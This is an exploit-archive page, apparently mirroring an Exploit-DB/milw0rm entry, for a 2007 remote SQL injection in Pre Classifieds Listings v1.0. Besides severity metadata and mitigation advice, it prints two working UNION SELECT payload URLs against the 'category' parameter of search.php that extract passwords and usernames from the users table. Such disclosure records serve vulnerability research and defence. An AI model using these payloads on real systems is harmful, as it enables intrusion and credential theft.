header-logo
Suggest Exploit
vendor:
Pre Classifieds Listings
by:
Cyber-Security.org
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Pre Classifieds Listings
Affected Version From: Pre Classifieds Listings v1.0
Affected Version To: Pre Classifieds Listings v1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2007

Pre Classifieds Listings v1.0 Remote SQL Injection

This vulnerability allows an attacker to perform a SQL injection attack on the Pre Classifieds Listings v1.0 website. By manipulating the 'category' parameter in the search.php page, the attacker can inject SQL code to retrieve sensitive information such as passwords or usernames from the 'users' table.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Also, keeping the software up to date with patches and security updates is advised.
Source

Exploit-DB raw data:

==============================================

Pre Classifieds Listings v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*

==============================================

Example: http://preproject.com/phppcl/

==============================================

# milw0rm.com [2007-05-03]

Navigation

Suggest Exploit

Services By CQR